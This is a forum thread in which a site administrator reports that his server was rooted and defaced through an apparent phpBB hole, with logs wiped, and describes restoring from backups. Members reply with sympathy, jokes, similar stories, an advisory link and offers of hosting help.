Announcement by Tide (since my thread appeared on the top): Ah, you know you're popular when... So here's the story, yesterday (well it's currently 2:30am here) at about 4pm, I see my wonderful site that you all love and helped create is tarnished by a monkey in a santa suit. Normally I'd be laughing my ass off like any male would, but being the victim here I was not amused. I checked all my websites and they we're all de-faced. Immediately we shut the machine down to assess the damage. On the surface it looks like a simple script kiddie exploited a hole in PHPBB (on another site I run) and gained root access to the machine. The scripts also deleted the access logs behind them so I no longer could trust such any program on the machine.

The only solution was a complete re-install with all new passwords and updated software. As my luck seems to dictate of late, I was not in town yet again and had a 3 hour drive back to meet my roommate and start this fun process. I do keep off-site backups and that went very well. It's now almost 3am and we're moving the last of the files over.

I do apologize for all the downtime lately. 2 days for 1 bad cpu fan, 1/2 day for my Apache mistake, and now another 1/2 day for scr1pt k1ddi3z.

I don't find it acceptable to have such downtime. Plans were in place to have a complete backup on another machine so a simple DNS switch would bring the site up. We'll be working on this in the next week or so.

Until then, this is the only site I currently am running. I don't know precisely that PHPBB was the culprit, and I want to ensure this does not happen again.

Thanks for your continued patronage,
Tide[/QUOTE]Thanks for the update, Chad. I (and everyone else here, I'm sure) am just happy that you are here devoting so much time towards this forum and giving us a place to call home. :)

Hey Chad,

Know this must have been frustrating to say the least. No need to apologise, these things happen, just glad to see we are back online again. If there is anything I can do to assist in the future, please let me know.

Business as Usual.
Adam.

all the VBGarage pics are fucked.

I bet it's one of those damn G35 owners that did it, jealous bastards!

Thanks for working to get it back.

I think getting hacked like that makes you more pissed than anything. Hopefully you got the exploit right and have "plugged the dike." :D

I told you this would happen months ago- and it's good you had local backups. You've now been hazed and can go on about your business. Once a site gains a certain level of exposure, it seems someone gets the idea to show their "mad skillz". Good job on the fast restore :)

teething pains suck.

http://img.villagephotos.com/p/2003-10/423426/christmaschimp.jpg

Ho Gee, and here I thought Linux and Apache were secure and these kind of things only happened to Microsoft-based site!

Sorry, couldn't resist. Sorry for all the trouble Tide and thanks for your great site.

Sly

Ho Gee, and here I thought Linux and Apache were secure and these kind of things only happened to Microsoft-based site!



:lol: *eleventy billion!

Here's something fun for you to look into:

http://premium.uploadit.org/cultofthejedi/12345x.JPG

Also, can't attach files- had to link to show the pic.

Did you also notice the two "stuck" new posts? Regardless of when you log on, the top two are always there.

Damn those monkeys!111

Because at 3am I wanted to get the site up first, then noticed I didnt set the system time. Its already been fixed.

Did you also notice the two "stuck" new posts? Regardless of when you log on, the top two are always there.

Ah, you know you're popular when... So here's the story, yesterday (well it's currently 2:30am here) at about 4pm, I see my wonderful site that you all love and helped create is tarnished by a monkey in a santa suit. Normally I'd be laughing my ass off like any male would, but being the victim here I was not amused. I checked all my websites and they we're all de-faced. Immediately we shut the machine down to assess the damage. On the surface it looks like a simple script kiddie exploited a hole in PHPBB (on another site I run) and gained root access to the machine. The scripts also deleted the access logs behind them so I no longer could trust such any program on the machine.

The only solution was a complete re-install with all new passwords and updated software. As my luck seems to dictate of late, I was not in town yet again and had a 3 hour drive back to meet my roommate and start this fun process. I do keep off-site backups and that went very well. It's now almost 3am and we're moving the last of the files over.

I do apologize for all the downtime lately. 2 days for 1 bad cpu fan, 1/2 day for my Apache mistake, and now another 1/2 day for scr1pt k1ddi3z.

I don't find it acceptable to have such downtime. Plans were in place to have a complete backup on another machine so a simple DNS switch would bring the site up. We'll be working on this in the next week or so.

Until then, this is the only site I currently am running. I don't know precisely that PHPBB was the culprit, and I want to ensure this does not happen again.

Thanks for your continued patronage,
Tide

Just an update, avatars and attachements should all be working fine. Thumbnails in vbGarage however will be offline until I get GD2 installed. no ETA.

And just where were you when this happened? :lol:

Damn those monkeys!111

And just where were you when this happened? :lol:
Recieving mutliple IMs asking if I knew what happened to the site of course. :redface:

I run Legacy Central's BBS on Apache, phpBB2 and Slackware, and it still got hacked, even with the latest version of the BBS software. It was part of a big defacement campaign, and it did very little damage, but it still sucked.

The great thing is that unless it's a big hole, the DB is pretty safe.

Dave
http://legacycentral.org

Thanks for the info Dave, unfortunately they removed all my logs too so I couldn't tell what they exploited to get into the system. For now I'm only running the Legacy site until I get a better idea what was the exact exploit was, the PHPBB issue seems most likely in my case, I had it running on 5 other websites, all 2.0.10.

Is this site hosted at a hosting facility or at a different type of location (business, residence, etc...)?

its a colocated server.

It's hosted at the Love Shack, bay-bay!

Sorry, had to take the box down for an hour to install new Apache and PHP stuffs.

She runs now!!!

thanks for all the hard work

If the guy's or guys' ip address was logged somewhere, please give it to me. :devil:

Wish I could, but I was rooted, they wiped bash history and all apache logs.

some beach!

Hunt them down and hang 'em all! I thought you were getting hacked again tonight when I was trying to respond to a post and all of sudden all I had was html code all over the place. Then the site wouldn't come up at all. Glad to see it was offensive action rather than defensive reaction and that you are back up, operational again. The site is missed when it is off-the-net.

SBT

It's hosted at the Love Shack, bay-bay!

It was indeed missed. Nice to see it back up. Some people really need to get a life and be civil. Kinda like the people that constantly drive in the left lane regardless of everything around them... complete lack of respect for others and their hard work.

Someone just did the same thing to my phpBB 2.0.10 at work. Luckily, the way I had it configured they were just the user "nobody" and couldn't do anything but write files to the /tmp directory. They were trying to set up a file server but the permissions wouldn't allow them to. They couldn't even overwrite HTML files - LOL. I found them when strange things started showing up in the error log. A quick review of the access logs showed how they got in, and all was patched.

My offer from the other thread still stands - if you need anything from temp webspace to secondary DNS, just PM or email me. We've got three T1's and all the disk space you'd need.

There's no way to stop someone from hacking a website. There's always a way around whatever security countermeasures someone decides to take. It's like the cops vs. radar detectors- always a one up kind of thing. Or like people who steal cars- no matter what you do, there will always be someone who can get the car if they want it enough.

Thanks John, but I already have everything that you're offering. Being the holidays and just getting back into town nothing has been put in place yet, and won't until after Christmas.

Luckily, the way I had it configured they were just the user "nobody" and couldn't do anything but write files to the /tmp directory. They were trying to set up a file server but the permissions wouldn't allow them to.
That is the way to do it. Use the file system permissions.

Um....

Probably this 'unserialize' sploit thats been running around...

http://www.hardened-php.net/advisories/012004.txt

No, it wasn't. It was the PHPBB exploit I previously mentioned.